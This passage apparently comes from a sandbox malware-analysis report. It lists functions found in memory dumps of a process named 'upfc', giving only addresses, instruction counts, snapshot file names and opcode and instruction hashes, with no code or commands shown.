                                                      • Instruction ID: f495a597d5e590c50e71d60e0b6095181d90eb4a0c30300a78de176f034fbdf8
                                                      • Opcode Fuzzy Hash: c882554d36b84bcc3a55f6c2286249b16809c4da072c9e66dedd3f85d47e028d
                                                      • Instruction Fuzzy Hash: 06310512E0CA655BE315B77C649E7F96789DF48375F04457BD04DC72A3CE28B8818288
                                                      Function 00007FF7C17B255B Relevance: .1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 69a0b4c7581ff8b0a7d96f0b10f4cbadb65929852560ed3c620bf31ed2792b50
                                                      • Instruction ID: 2e11235903dba2f22e68a2b0d6c5142bc6797cb198a1151ff9f095492d769072
                                                      • Opcode Fuzzy Hash: 69a0b4c7581ff8b0a7d96f0b10f4cbadb65929852560ed3c620bf31ed2792b50
                                                      • Instruction Fuzzy Hash: D33169A448F3C16FC703AB750C345A2BFB89E5312A71D85EBE4D5CA4A3D64C295AC323
                                                      Function 00007FF7C17911A1 Relevance: .1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 18838322b2ad6b38c95ec9b9e9e60b836eade7ed86e8e6274513845d2dc50e88
                                                      • Instruction ID: a09ac162de2a682d6cdb6508b1ae02395b4be5f974361d2334c1c167fa36f4ad
                                                      • Opcode Fuzzy Hash: 18838322b2ad6b38c95ec9b9e9e60b836eade7ed86e8e6274513845d2dc50e88
                                                      • Instruction Fuzzy Hash: 2831837190D64A8FDB45EB79C8599A9BBF0FF1A320F4405FAC019CB2E3DA68A845C750
                                                      Function 00007FF7C17CB72D Relevance: .1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef8451f02b56dcdddcf8ec1d9bb55cf99367614aa03daf30f509b40ff43d4db2
                                                      • Instruction ID: f18638416826af3aab92093aefa369f5ce82bf477b8fb889cfd6add6b043cf93
                                                      • Opcode Fuzzy Hash: ef8451f02b56dcdddcf8ec1d9bb55cf99367614aa03daf30f509b40ff43d4db2
                                                      • Instruction Fuzzy Hash: 3B314337A080129BE705FB6EF8A65E97390EF813747484177D08C8F1A3EE24744AC694
                                                      Function 00007FF7C1790998 Relevance: .1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bddfa33f1fcbaead57f010b76d583248f82786453306973c2c2798b164ab8b5c
                                                      • Instruction ID: d9908cb05f0a6f8304c053e85e83ddcb134e25d3ff0bc9fe663624b438a2692c
                                                      • Opcode Fuzzy Hash: bddfa33f1fcbaead57f010b76d583248f82786453306973c2c2798b164ab8b5c
                                                      • Instruction Fuzzy Hash: AD21D420B28D590FE788B72D945E775B2C6EF9C325F4001B9E80EC33D7DD68AC414295
                                                      Function 00007FF7C1790C25 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d2ab417fa4864237f9b533051bf41f308c16a1de36087c8dc757d4f6911c8ed6
                                                      • Instruction ID: 56d10e002ef58c89f766a16fe6212e887ba086a00ec5d0e9df7bc91604c6a240
                                                      • Opcode Fuzzy Hash: d2ab417fa4864237f9b533051bf41f308c16a1de36087c8dc757d4f6911c8ed6
                                                      • Instruction Fuzzy Hash: 0621013591C7898FE302EF79C8482ECBBA4EF46334F5441B6C0449B2D3DA786549CBA1
                                                      Function 00007FF7C1791F88 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c0fc13137a429378921833c633d8d34b5ff304a2c44a08189902e38b89b2002
                                                      • Instruction ID: 8f9787e674a5b66ad752c3a9fa6710f1e2562d19ea4d8e641ed7c75f36bc93d6
                                                      • Opcode Fuzzy Hash: 2c0fc13137a429378921833c633d8d34b5ff304a2c44a08189902e38b89b2002
                                                      • Instruction Fuzzy Hash: 5B118632E1C9198EEB64FE3D94496F8A392EF4C331FD401B6D40DD3193DEA968594650
                                                      Function 00007FF7C17B2649 Relevance: .1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ffba0ac23631c4bcf589d75ade91549bfd4b3d3451ecaf9947c306e8b027fbe
                                                      • Instruction ID: 0729b28bbe51877d704d714c658f34ae3f7dfef86e0c1506578228b708acbe36
                                                      • Opcode Fuzzy Hash: 5ffba0ac23631c4bcf589d75ade91549bfd4b3d3451ecaf9947c306e8b027fbe
                                                      • Instruction Fuzzy Hash: 5511F36050F7C11FC703973A4C69594BFB0AF1722078E86FBC489CB5E3D65D684A8762
                                                      Function 00007FF7C17C787D Relevance: .1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6abf1385aab4751e0d3b140c08aac3eb039c82242445ea1ebe169fea3f022a6c
                                                      • Instruction ID: e5732dce0f2066e3ea3777b2c32ab5ad4d25d3f5d49199c61d2df8b73aa37516
                                                      • Opcode Fuzzy Hash: 6abf1385aab4751e0d3b140c08aac3eb039c82242445ea1ebe169fea3f022a6c
                                                      • Instruction Fuzzy Hash: 05118221D4E6C24FE31A6E354875465BFA0EF6A63078901F7C189CB0E3DE5D980AC362
                                                      Function 00007FF7C1791FC9 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8eb7b3f777e70a63fde5cc853af094d1f574193fa831fbabfc2f13f5286eefe3
                                                      • Instruction ID: f9632783ead7badec000c7c79e63bd17a4fcad6254de62bfa84cc3912c54dac0
                                                      • Opcode Fuzzy Hash: 8eb7b3f777e70a63fde5cc853af094d1f574193fa831fbabfc2f13f5286eefe3
                                                      • Instruction Fuzzy Hash: CE11FE31A1840A8FEB54FF29C449BB8A3A2AF59321F9541B5D00DC7293DEA9A8558B50
                                                      Function 00007FF7C1790C38 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2a5cff076a7ac70391d34743302604dbd6dad1b03affb162b7b9f8ab12b6d65
                                                      • Instruction ID: a15e846fa1af57cae6c90f3538bc93ec922523e15d72208cd0461064216900c4
                                                      • Opcode Fuzzy Hash: c2a5cff076a7ac70391d34743302604dbd6dad1b03affb162b7b9f8ab12b6d65
                                                      • Instruction Fuzzy Hash: 4E11AC36A1C7898FE702EB7888492DDBFB0EF46220F5545B6C084DB293E678564987A0
                                                      Function 00007FF7C17CD6FE Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e67abf31f3420681b16ce1bf1c7f6c577f9a6fdf04adc98a1f861ecb4ea9c1e8
                                                      • Instruction ID: 9595082fc7a8f5becca17855e4aa082f4988920207f8be81f10ecdafcb254c11
                                                      • Opcode Fuzzy Hash: e67abf31f3420681b16ce1bf1c7f6c577f9a6fdf04adc98a1f861ecb4ea9c1e8
                                                      • Instruction Fuzzy Hash: E4015E31F0446A8AEB54E959D9557FDB2E1EB98325F500176D00DD3182DAB9A980CBA0
                                                      Function 00007FF7C1790C40 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 31f4267a275c1b64dfdbc4c3b2447f2ca25d956ffc738a40ed06dc14f76163fd
                                                      • Instruction ID: 6827df8f9422277e6bc8451e7924de6265b56786b7509167b92538d995a36ad7
                                                      • Opcode Fuzzy Hash: 31f4267a275c1b64dfdbc4c3b2447f2ca25d956ffc738a40ed06dc14f76163fd
                                                      • Instruction Fuzzy Hash: 38018B3690C7898FE702EB7888582D9BFB0EF46220F1545B6C481DB293D6785648CB90
                                                      Function 00007FF7C17A4591 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 46fc22273bf8b744c011f5a3733779683c671415e2c547a9ae21c7bb8fa04d19
                                                      • Instruction ID: ce75ceb6a4f3b947c598ece52a0d40710861a4755958162c11217b1aa8f08648
                                                      • Opcode Fuzzy Hash: 46fc22273bf8b744c011f5a3733779683c671415e2c547a9ae21c7bb8fa04d19
                                                      • Instruction Fuzzy Hash: C9F02831A0C9864FE322A73584102B97B91FF99320F5803BBC08EC74D3DDACE5158365
                                                      Function 00007FF7C17BD505 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b53e0e7e7c37c43fe2b381f920214e7ad1fd848a9914025b62e07ad32eb0dae9
                                                      • Instruction ID: 82b8afd69c0e44ee1bfcaf3b5468edb3f0b817544d9c961a7400ed652f5d725b
                                                      • Opcode Fuzzy Hash: b53e0e7e7c37c43fe2b381f920214e7ad1fd848a9914025b62e07ad32eb0dae9
                                                      • Instruction Fuzzy Hash: 51F0A06060DE8A1FC399D37D68603D0BBE1FB9A23474903E7D088C758BC958686A83E1
                                                      Function 00007FF7C1790C48 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf57509f4113e99e49401869ced851d1f2047bbd9ca5f50acc20cd9b543e08d9
                                                      • Instruction ID: 1b9469c187a5810d9fd7dfdbcda51948a9fadd6553f7a2ac1a901be382a98857
                                                      • Opcode Fuzzy Hash: bf57509f4113e99e49401869ced851d1f2047bbd9ca5f50acc20cd9b543e08d9
                                                      • Instruction Fuzzy Hash: F0018C3690C7898FE702EB78C848299BFB0AF06320F1542EAD051DB293E6785A48C790
                                                      Function 00007FF7C17A40E8 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ff3a5c501e345ba335324c71e9e31287f9558c9258faabb56710829cbaa8474
                                                      • Instruction ID: 65bb4b52ccf2299b9153cb1e6049caacc472e4914c5a72dfc32c8c33f7a08209
                                                      • Opcode Fuzzy Hash: 6ff3a5c501e345ba335324c71e9e31287f9558c9258faabb56710829cbaa8474
                                                      • Instruction Fuzzy Hash: FB014B71E1881A8FEB54AF58C8556BEB3A1FB58361F40423AC01AA2696DFB868018791
                                                      Function 00007FF7C17CAC83 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a63cb0e1070ef3f079c3684abcf41dc844465549d7e2630c1cfce785ab464df
                                                      • Instruction ID: a35bada03782cb3545ff524c505e91f803ec11b04c18c051aecd17b9acfb26d5
                                                      • Opcode Fuzzy Hash: 4a63cb0e1070ef3f079c3684abcf41dc844465549d7e2630c1cfce785ab464df
                                                      • Instruction Fuzzy Hash: 9AF09060A18D0A9FE785BF2940653F8F2D1FFAC321F940176D00CC6287DE686844C795
                                                      Function 00007FF7C1790C50 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd8f8ed9c71b062d504d2108c6d339c8ce78021479893f8b9369441ecfd12ce7
                                                      • Instruction ID: 75007f29b25650f75f5d89928687d307915ed90dfd9b5623c51c7618dcdfe358
                                                      • Opcode Fuzzy Hash: dd8f8ed9c71b062d504d2108c6d339c8ce78021479893f8b9369441ecfd12ce7
                                                      • Instruction Fuzzy Hash: B1017C3580C7C98FE702EB78884829DBFB0AF06324F1442E6D451DB293EA785A48C751
                                                      Function 00007FF7C1792096 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c0b67d8018478311337d0be313e8e759ba3daf077f094f559c4b14e2bffb0724
                                                      • Instruction ID: ff3f6a01ba89ec7791faf59098130f0f955a6273bef64bef5e651cafb25ca273
                                                      • Opcode Fuzzy Hash: c0b67d8018478311337d0be313e8e759ba3daf077f094f559c4b14e2bffb0724
                                                      • Instruction Fuzzy Hash: D2F0E131D5840E8BEB64FE29C855BF8B366EB58331F9401BAC40DD3193DEBDA9858B50
                                                      Function 00007FF7C17CA989 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b1f1cf74fa59c0000a01b954ae9c3c78ef557adb949eab19df2e8487df73ae2
                                                      • Instruction ID: 37d845fb4c5d3f101c117ae6c434f589514f95be3f4b1afe080e844664355bb4
                                                      • Opcode Fuzzy Hash: 8b1f1cf74fa59c0000a01b954ae9c3c78ef557adb949eab19df2e8487df73ae2
                                                      • Instruction Fuzzy Hash: 52F0A02174CBC40FC72997294865161BFE1DB5B10234A42EFC096C76A3D955EC8A8745
                                                      Function 00007FF7C17AB852 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fae75f420432aec1b71d4ff6ae57c64dbe3f67d66abb06ec3ccc5971e32be42b
                                                      • Instruction ID: 8c143d20087074155bfe46df139a58c959e6564bbc6215d2ea9ec6867d6726eb
                                                      • Opcode Fuzzy Hash: fae75f420432aec1b71d4ff6ae57c64dbe3f67d66abb06ec3ccc5971e32be42b
                                                      • Instruction Fuzzy Hash: 60F0C4709089199FEBD4FF288855BA9B2A1FF98310F5082B9D00DD3292CE3469858B90
                                                      Function 00007FF7C17AA7AB Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: badb7e0ddeb5ac7d5f3c1ca34f28f8679b9070207b9afdcbe8175b4a132eaba8
                                                      • Instruction ID: 4fe394a1745a97e567b0cb37ae6206240f4a165bf800db378d64f6fd71194c32
                                                      • Opcode Fuzzy Hash: badb7e0ddeb5ac7d5f3c1ca34f28f8679b9070207b9afdcbe8175b4a132eaba8
                                                      • Instruction Fuzzy Hash: 70F05E21E0C90B5BE750BB2984906A9A251AB59320F948675D40DDB2C7DEACEC0843A0
                                                      Function 00007FF7C17BC7A9 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66b32461f60cabb6a3b24d0609fd25a89bc631ab30e6334e05a658b1f2fd7e45
                                                      • Instruction ID: e96960893c51c8c45bffad3232de0eee44c321af8f789e3d94656d8f5f8f7dd0
                                                      • Opcode Fuzzy Hash: 66b32461f60cabb6a3b24d0609fd25a89bc631ab30e6334e05a658b1f2fd7e45
                                                      • Instruction Fuzzy Hash: 7CF0656551E7C40FD312AB388D654147FF0EF2B10535A45FBC4C9CB5B3D65A484AC312
                                                      Function 00007FF7C17920CF Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1d35f1724f1adc6db49046a45d6106ecbbea99bb5a5f4fe40b332a5eb99e0b2
                                                      • Instruction ID: bc585f53cb95a19b4205754609885cded2c5bd28568238c9dcb5f1eb39e2eeb7
                                                      • Opcode Fuzzy Hash: f1d35f1724f1adc6db49046a45d6106ecbbea99bb5a5f4fe40b332a5eb99e0b2
                                                      • Instruction Fuzzy Hash: 36F03031E184098BEB10FE29C849AB8A357AF59370F9041B5C40DD32D7EDADA9498660
                                                      Function 00007FF7C1792B40 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f7ab15e07f9f44bd1b39b12e138568b7c5039ab6e02509fa8ce3889be5409fc
                                                      • Instruction ID: 278edd2aa508107ed6df67ac48e2af0dcdde818e0e4f5d921451e21bda3221cd
                                                      • Opcode Fuzzy Hash: 8f7ab15e07f9f44bd1b39b12e138568b7c5039ab6e02509fa8ce3889be5409fc
                                                      • Instruction Fuzzy Hash: 20F0A030E0910A4FF744BA35C4143BAA3A09F89330F9400B4C90DD32D3DE28AD458750
                                                      Function 00007FF7C17C7849 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f0aec44548bd7574aac2de744dfd5fb1d684b9b8393afd8e27cee1b2698bc57c
                                                      • Instruction ID: 397107e6849897ffd28a487df8b697637fcfb4f77adfe8f79cfbbb6267c61233
                                                      • Opcode Fuzzy Hash: f0aec44548bd7574aac2de744dfd5fb1d684b9b8393afd8e27cee1b2698bc57c
                                                      • Instruction Fuzzy Hash: 46E04F3164A7C44FC30A6A348C698503B71DA6B11274A01DBC045CF1B3D51DCC49C712
                                                      Function 00007FF7C17CD8B9 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3290aff71b6afd0aab4bef220074415453e6efc7f1754bf86535644e24292ac6
                                                      • Instruction ID: a752bff46a8644c706b792681ece2bb2c997ee0193495737697f58fb897ac028
                                                      • Opcode Fuzzy Hash: 3290aff71b6afd0aab4bef220074415453e6efc7f1754bf86535644e24292ac6
                                                      • Instruction Fuzzy Hash: 83E0867154E7C04FC70B9B35C8A8984BF70EE5721138A41DBC045CF5B3D629D88AC711
                                                      Function 00007FF7C17CD839 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 602a853657605497d9d49a718dec2aabc7eae923d4a6c32b8fb464fb808d9a62
                                                      • Instruction ID: 18fded0ee2ff07c0100d6524c6aa97537d899203f3c04f670a8f9f58ddab1286
                                                      • Opcode Fuzzy Hash: 602a853657605497d9d49a718dec2aabc7eae923d4a6c32b8fb464fb808d9a62
                                                      • Instruction Fuzzy Hash: 42E04F7154E7C04FC70B9B358868944BF70EE5721138A41DBC045CF5B3D6299889C711
                                                      Function 00007FF7C17C8ED9 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4ea452d202771ea8e134744fbd0e6357e3703f35a7fe60bc480cd2af4f3fe41b
                                                      • Instruction ID: 3580fd3100811e4e184f943d4da6cebffd7ffc8e159ca8d2211b02a4123ca208
                                                      • Opcode Fuzzy Hash: 4ea452d202771ea8e134744fbd0e6357e3703f35a7fe60bc480cd2af4f3fe41b
                                                      • Instruction Fuzzy Hash: 14E0127154A7884FC70A9B64CC799803FB0EE6B21178B01D7C045CF5B3EA1D8D89CB52
                                                      Function 00007FF7C17CA4F0 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF7C17CA460 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
